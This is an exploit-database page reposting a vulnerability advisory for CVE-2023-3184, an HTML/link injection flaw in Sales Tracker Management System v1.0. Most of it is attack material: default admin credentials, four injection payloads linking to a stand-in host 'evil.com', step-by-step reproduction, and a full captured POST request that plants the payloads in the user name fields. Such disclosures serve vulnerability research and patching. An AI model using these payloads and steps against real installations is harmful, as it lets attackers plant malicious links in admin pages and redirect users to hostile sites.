Advertisement






Sales Tracker Management System v1.0 Multiple Vulnerabilities

CVE Category Price Severity
CVE-2023-3184 CWE-XXX $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-06-13
CPE
cpe:cpe:/a:sales-tracker-management-system:1.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023060016

Below is a copy:

Sales Tracker Management System v1.0 Multiple Vulnerabilities
Exploit Title: Sales Tracker Management System v1.0  Multiple Vulnerabilities 
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://www.sourcecodester.com/>
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184

==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123

=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>


===============================
STEPS_TO_REPRODUCE
===============================
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN  CREDENTIALS OF ADMIN 
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user` 
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename`  `lastname` and in `username` 
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER  IS ADDED  .
6. AFTER CLICKING ON THE  EACH PAYLOAD IT REDIRECT ME TO EVIL SITE



==========================================
BURPSUITE_REQUEST
==========================================
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua: 
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"


------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"

1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary7hwjNQW3mptDFOwo--

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum